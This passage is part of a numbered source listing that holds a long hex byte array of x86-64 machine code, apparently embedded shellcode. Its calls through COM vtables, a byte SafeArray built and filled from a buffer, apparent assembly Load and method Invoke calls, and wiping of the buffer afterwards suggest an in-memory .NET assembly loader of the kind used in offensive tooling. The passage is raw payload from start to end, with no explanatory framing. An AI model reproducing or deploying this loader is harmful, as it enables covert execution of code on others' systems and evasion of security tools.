222 | 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55, | |
223 | 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82, | |
224 | 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04, | |
225 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0, | |
226 | 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45, | |
227 | 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, | |
228 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4, | |
229 | 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b, | |
230 | 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
231 | 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, | |
232 | 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82, | |
233 | 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c, | |
234 | 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, | |
235 | 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45, | |
236 | 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48, | |
237 | 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, | |
238 | 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10, | |
239 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48, | |
240 | 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, | |
241 | 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, | |
242 | 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, | |
243 | 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, | |
244 | 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, | |
245 | 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02, | |
246 | 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, | |
247 | 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, | |
248 | 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, | |
249 | 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, | |
250 | 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48, | |
251 | 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
252 | 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, | |
253 | 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, | |
254 | 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b, | |
255 | 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, | |
256 | 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8, | |
257 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, | |
258 | 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
259 | 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, | |
260 | 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10, | |
261 | 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, | |
262 | 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, | |
263 | 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc, | |
264 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, | |
265 | 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
266 | 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0, | |
267 | 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
268 | 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb, | |
269 | 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
270 | 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20, | |
271 | 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, | |
272 | 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, | |
273 | 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, | |
274 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, | |
275 | 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, | |
276 | 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, | |
277 | 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, | |
278 | 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, | |
279 | 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7, | |
280 | 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, | |
281 | 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48, | |
282 | 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b, | |
283 | 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
284 | 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00, | |
285 | 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b, | |
286 | 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2, | |
287 | 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, | |
288 | 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45, | |
289 | 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec, | |
290 | 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, | |
291 | 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00, | |
292 | 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
293 | 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
294 | 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18, | |
295 | 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00, | |
296 | 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, | |
297 | 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16, | |
298 | 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00, | |
299 | 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b, | |
300 | 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, | |
301 | 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, | |
302 | 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00, | |
303 | 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, | |
304 | 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
305 | 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95, | |
306 | 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff, | |
307 | 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00, | |
308 | 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, | |
309 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
310 | 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, | |
311 | 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff, | |
312 | 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00, | |
313 | 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, | |
314 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
315 | 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0, | |
316 | 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, | |
317 | 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8, | |
318 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, | |
319 | 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
320 | 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0, | |
321 | 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00, | |
322 | 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01, | |
323 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
324 | 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, | |
325 | 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
326 | 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, | |
327 | 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00, | |
328 | 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, | |
329 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
330 | 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41, | |
331 | 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, | |
332 | 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, | |
333 | 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
334 | 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, | |
335 | 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, | |
336 | 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, | |
337 | 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, | |
338 | 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45, | |
339 | 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff, | |
340 | 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, | |
341 | 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, | |
342 | 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30, | |
343 | 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
344 | 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, | |
345 | 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
346 | 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
347 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, | |
348 | 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, | |
349 | 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, | |
350 | 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, | |
351 | 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, | |
352 | 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, | |
353 | 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, | |
354 | 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01, | |
355 | 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
356 | 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, | |
357 | 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, | |
358 | 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, | |
359 | 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, | |
360 | 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85, | |
361 | 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85, | |
362 | 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
363 | 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, | |
364 | 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38, | |
365 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, | |
366 | 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, | |
367 | 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00, | |
368 | 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00, | |
369 | 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, | |
370 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
371 | 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00, | |
372 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, | |
373 | 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, | |
374 | 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, | |
375 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
376 | 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00, | |
377 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00, | |
378 | 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02, | |
379 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, | |
380 | 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, | |
381 | 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b, | |
382 | 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95, | |
383 | 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, | |
384 | 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00, | |
385 | 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
386 | 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00, | |
387 | 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
388 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, | |
389 | 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, | |
390 | 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, | |
391 | 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83, | |
392 | 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00, | |
393 | 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00, | |
394 | 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, | |
395 | 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48, | |
396 | 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00, | |
397 | 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff, | |
398 | 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48, | |
399 | 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00, | |
400 | 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d, | |
401 | 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, | |
402 | 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85, | |
403 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, | |
404 | 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
405 | 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, | |
406 | 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00, | |
407 | 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39, | |
408 | 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00, | |
409 | 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, | |
410 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
411 | 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, | |
412 | 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0, | |
413 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20, | |
414 | 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c, | |
415 | 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8, | |
416 | 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0, | |
417 | 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, | |
418 | 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, | |
419 | 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48, | |
420 | 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, | |
421 | 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, | |
422 | 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, | |
423 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89, | |
424 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
425 | 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00, | |
426 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, | |
427 | 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
428 | 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
429 | 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, | |
430 | 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, | |
431 | 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30, | |
432 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, | |
433 | 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, | |
434 | 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
435 | 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, | |
436 | 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, | |
437 | 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
